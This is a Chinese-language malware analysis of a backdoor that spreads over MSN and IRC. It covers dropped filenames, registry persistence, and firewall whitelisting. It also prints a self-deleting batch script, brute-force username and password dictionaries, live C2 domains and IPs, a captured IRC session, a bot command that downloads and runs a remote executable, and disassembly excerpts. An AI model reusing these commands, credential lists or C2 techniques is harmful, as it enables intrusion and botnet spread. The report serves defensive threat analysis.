中文名称: MSN机器人变种
病毒类型: 后门类
文件MD5: C06D070C232BC6AC6346CBD282EF73AE
文件长度: 40,960 字节
感染系统: Windows9X以上版本
开发工具: Microsoft Visual C++
加壳类型: Kkrunchy 0.23 (Arabic)
病毒描述:
该病毒运行后,衍生病毒副本到系统目录下,添加注册表自动运行项以跟随系统引导病毒体。病毒体判断本地是否有MSN 窗体存在,如无则连接IRC服务器,接收指令下载病毒体到本机运行,如有则向所有联系人发送病毒副本*.rar。由于病毒体具有执行IRC指令的功能,受感染用户可被控制下载任意程序到本机执行,极具危害性与传播性。
行为分析:
1、文件运行后会衍生副本
%System32%\*.exe
%System32%\*.rar
/*字符‘*’代表任意多个字符,*.exe病毒名从自身字符串序列中随机选取*/
lssas.exe"
Isass.exe"
csrs.exe"
logon.exe"
winIogon.exe"
explorer.exe"
winamp.exe"
firewall.exe"
spoolsvc.exe"
spooIsv.exe"
algs.exe"
iexplore.exe"
//*.rar文件名从下列字符串中选取
game
video
photoalbum
2、新增注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\
Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
键值:"%WINDIR%System32\explorer.exe"
字符串"%WINDIR%System32\explorer.exe:*:Enabled:Windows Explorer"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
键值:Windows Explorer
字符串"%WinDir%\System32\explorer.exe"
/*病毒名并不一定,参考第一项注释*/
3、如有MSN程序存在,则向联系人发送病毒副本video.rar,病毒测试用的MSN版本为最新的8.1(Build 8.1 0178.00);发送的文件名从病毒体自带字符串中选取,参数第一项注释。
4、病毒生成自创建.bat文件,用于在衍生病毒副本后,删除自身:
@echo off
:deleteagain
del /A:H /F 病毒名.exe
del /F 病毒名.exe
if exist 病毒名.exe goto deleteagain
del fcmhl.bat
通过自带字典枚举用户名与密码试图传播:
用户名表:
staff 、teacher、owner、 student、intranet、 main、office、control、 siemens、compaq、dell、cisco、 oracle、data、 access、 database、domain、backup、technical、mary、 katie、 kate、george、eric、 none、 guest、 chris、 neil、 brian、 susan、luke、peter、john、 mike、 bill、 fred、wwwadmin、oemuser、user、 homeuser、home、 internet、root、server、linux、 unix、 computer、admin、 admins、administrat 、 administrateur 、administrador、administrator
密码列表:
Winpass、blank、nokia、 orainstall、sqlpassoainstall、db1234、databasepassword、databasepass、dbpassword 、dbpass 、domainpassword 、domainpass 、hello、hell、love、money、 slut、 bitch 、fuck 、exchange 、loginpass、login 、win2000、winnt、winxp 、win2k、win98 、windows 、oeminstall、accounting、accounts 、letmein、outlookmail 、qwerty、temp123、temp、null、default、changeme、demo、 test 、 2005、 2004 、 2001 、 secret、 payday、 deadline、work、 1234567890、 123456789、 12345678、 1234567、123456、 12345、 1234 、 pass 、 pass1234、 passwd、 password、 password1
网络行为:
(1)协议:IRC
目的端口:7777
域名或IP地址:n.nadnadzz.info(67.43.232.37(美国))
(2)协议:IRC
目的端口:6666
域名或IP地址:(67.43.232.36 (美国))
(3)协议:IRC
目的端口:5555
域名:n.ircstyle.net(67.43.232.35(美国))
机器人BOT启动后与服务器的交互信息如下,由于服务器关闭,未能抓取更多网络包:
USER mrwxmt mrwxmt mrwxmt :auwgwkmzxqdrfvoo
NICK DwPkIqCi
:hub.18161.com 001 DwPkIqCi :edyou, DwPkIqCi!mrwxmt@本地IP
:hub.18161.com 005 DwPkIqCi MAP KNOCK SAFELIST HCN MAXCHANNELS=80 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
:hub.18161.com 005 DwPkIqCi WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=edyou CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
:DwPkIqCi MODE DwPkIqCi :+iRp
MODE DwPkIqCi +xi
JOIN #braz
USERHOST DwPkIqCi
:[email protected] JOIN :#braz
:hub.18161.com 332 DwPkIqCi #braz :=d4hhWo0HNky1/vuRXCRNhb7Sf+SmJU3bmw48NQteMwR
:hub.18161.com 333 DwPkIqCi #braz ryin 1191283243
:hub.18161.com 353 DwPkIqCi @ #braz :DwPkIqCi
:hub.18161.com 366 DwPkIqCi #braz :End of /NAMES list.
:hub.18161.com 302 DwPkIqCi :[email protected]
MODE #braz +smntu
:hub.18161.com 482 DwPkIqCi #braz :You’re not channel operator
JOIN #rs
:hub.18161.com 474 DwPkIqCi #rs :Cannot join channel (+b)
PING :hub.18161.com
PONG :hub.18161.com
连接的IRC服务器列表:
n.nadnadzz.info
hub.18161.com
n.ircstyle.net加入频道:
#braz
#rs
加入频道后接收指令下载病毒体:
: n.ircstyle.net [00|CHN|XP|144635] #game :!ix.wget -S -s|!ix.wget
http://nadsam0.info(72.10.167.74)/msnz.exe r –s
/*从指定地地址下载病毒体,衍生到c:\根目录下,并重命名为msnz.exe ,立刻执行*/
机器人支持下列标准IRC指令:
USER %s %s %s :%s
PASS %s
NOTICE %s :
PRIVMSG %s :
响应mIRC如下命令
NOTICE
NICK
USERHOST %s
MODE %s +xi
MODE %s +smntu
JOIN
ERROR
DCC SEND "%s" %d %s %d
响应eggdrop v1.6.16如下命令
SEND
PRIVMSG
MODE
PONG
PONG %s
代码分析:
创建互斥体
004180F3 FF15 FC904100 CALL DWORD PTR DS:[4190FC] ; kernel32.CreateMutexA
0012ECB4 00000000 |pSecurity = NULL
0012ECB8 00000000 |InitialOwner = FALSE
0012ECBC 0012EE64 \MutexName = "fde34bde0f48c517f3c521468d9a48103a72" //互斥体名字
获得系统目录以衍生病毒,%WinDir%\System32\
00408706 |. FF15 44904100 |CALL DWORD PTR DS:[419044] ; \GetSystemDirectoryA
0040876C |. 50 |PUSH EAX ; /s2 = "病毒体当前路径"
0040876D |. 8D85 E4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-21C] ; |
00408773 |. 50 |PUSH EAX ; |s1 = "C:\WINDOWS\System32\lssas.exe"
00408774 |. E8 5B000100 |CALL zyc.004187D4 ; \_stricmp
00408881 |. 50 PUSH EAX ; /FileName = "C:\WINDOWS\System32\winamp.exe"
00408882 |. FF15 20914100 CALL DWORD PTR DS:[419120] ; \DeleteFileA
00408888 |. 6A 00 PUSH 0 ; /FailIfExists = FALSE
0040888A |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118] ; |
00408890 |. 50 PUSH EAX ; |NewFileName = "C:\WINDOWS\System32\winamp.exe"
00408891 |. 8D85 DCFCFFFF LEA EAX,DWORD PTR SS:[EBP-324] ; |
00408897 |. 50 PUSH EAX ; |ExistingFileName
00408898 |. FF15 F4904100 CALL DWORD PTR DS:[4190F4] ; \CopyFileA
设置衍生病毒体文件属性
004088BB |> \6A 04 PUSH 4 ; /FileAttributes = SYSTEM
004088BD |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118] ; |
004088C3 |. 50 PUSH EAX ; |FileName = "C:\WINDOWS\System32\winamp.exe"
004088C4 |. FF15 24914100 CALL DWORD PTR DS:[419124] ; \SetFileAttributesA
004088CA |. 6A 02 PUSH 2 ; /FileAttributes = HIDDEN
004088CC |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118] ; |
004088D2 |. 50 PUSH EAX ; |FileName = "C:\WINDOWS\System32\winamp.exe"
004088D3 |. FF15 24914100 CALL DWORD PTR DS:[419124] ; \SetFileAttributesA
创建注册表键值:
00408465 FF15 14904100 CALL DWORD PTR DS:[419014] ; ADVAPI32.RegCreateKeyExA
0012E80C 0040846B /CALL 到 RegCreateKeyExA 来自 Backdoor.00408465
0012E810 80000002 |hKey = HKEY_LOCAL_MACHINE
0012E814 0041DB68 |Subkey = "Software\Microsoft\Windows\CurrentVersion\Run"
0012E818 00000000 |Reserved = 0
0012E81C 00000000 |Class = NULL
0012E820 00000000 |Options = REG_OPTION_NON_VOLATILE
0012E824 000F003F |Access = KEY_ALL_ACCESS
0012E828 00000000 |pSecurity = NULL
0012E82C 0012E834 |pHandle = 0012E834
0012E830 00000000 \pDisposition = NULL
004084CA FF15 10904100 CALL DWORD PTR DS:[419010] ; ADVAPI32.RegSetValueExA
0012E81C 0000000C |hKey = C
0012E820 0041DA50 |ValueName = "Client Server Runtime Process"
0012E824 00000000 |Reserved = 0
0012E828 00000001 |ValueType = REG_SZ
0012E82C 0012E838 |Buffer = 0012E838
0012E830 0000001D \BufSize = 1D (29.)
0040827E FF15 14904100 CALL DWORD PTR DS:[419014] ; ADVAPI32.RegCreateKeyExA
0012D7F4 80000002 |hKey = HKEY_LOCAL_MACHINE
0012D7F8 0041DAD4 |Subkey = "SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
0012D7FC 00000000 |Reserved = 0
0012D800 00000000 |Class = NULL
0012D804 00000000 |Options = REG_OPTION_NON_VOLATILE
0012D808 00020006 |Access = KEY_WRITE
0012D80C 00000000 |pSecurity = NULL
0012D810 0012D818 |pHandle = 0012D818
0012D814 0012D81C \pDisposition = 0012D81C
比较,等于0则结束程序
0041835E 833D 282B4200 0>CMP DWORD PTR DS:[422B28],0
00418365 74 11 JE SHORT Backdoor.00418378
IRC命令相关函数:
0041836C 68 A8274200 PUSH Backdoor.004227A8 ; ASCII "#braz"
00418371 E8 8F69FFFF CALL Backdoor.0040ED05 //IRC相关函数调用
0040EC05 68 A0364200 PUSH Backdoor.004236A0 ; ASCII "7777"
0040EC0A 68 A0354200 PUSH Backdoor.004235A0 ; ASCII "n.nadnadzz.info"
0040EC0F E8 D664FFFF CALL Backdoor.004050EA
0040E924 68 D03B4200 PUSH Backdoor.00423BD0 ; ASCII "zeuury"
0040E929 E8 669A0000 CALL Backdoor.00418394 ; JMP 到 MSVCRT.strcpy 产生昵称
0040E957 68 503D4200 PUSH Backdoor.00423D50 ; ASCII "qemwjvtrbkmkfnja"
0040E95C E8 339A0000 CALL Backdoor.00418394 ; JMP 到 MSVCRT.strcpy 产生随机字符
0040E97F 68 90ED4100 PUSH Backdoor.0041ED90 ; ASCII "USER %s %s %s :%s" 用户名组成形式
0040E984 E8 9C050000 CALL Backdoor.0040EF25
0012E6E8 0012E830 |FileName = "C:\WINDOWS\System32\webcl32.dll"
00409B7A 68 70DE4100 PUSH Backdoor.0041DE70 ; ASCII "USA"
00409B7F FF75 08 PUSH DWORD PTR SS:[EBP+8]
00409B82 E8 4DEC0000 CALL Backdoor.004187D4 ; JMP 到 MSVCRT._stricmp
0012EA2C 0012EA4C |s1 = "CHN"
0012EA30 0041DE70 \s2 = "USA"
0040EBA1 68 74EC4100 PUSH Backdoor.0041EC74 ; ASCII "NICK %s"
0040EBA6 E8 7A030000 CALL Backdoor.0040EF25
0012EA3C 0041EC74 ASCII "NICK %s"
0012EA40 0012EC18 ASCII "[UNK][0]1B\AQ"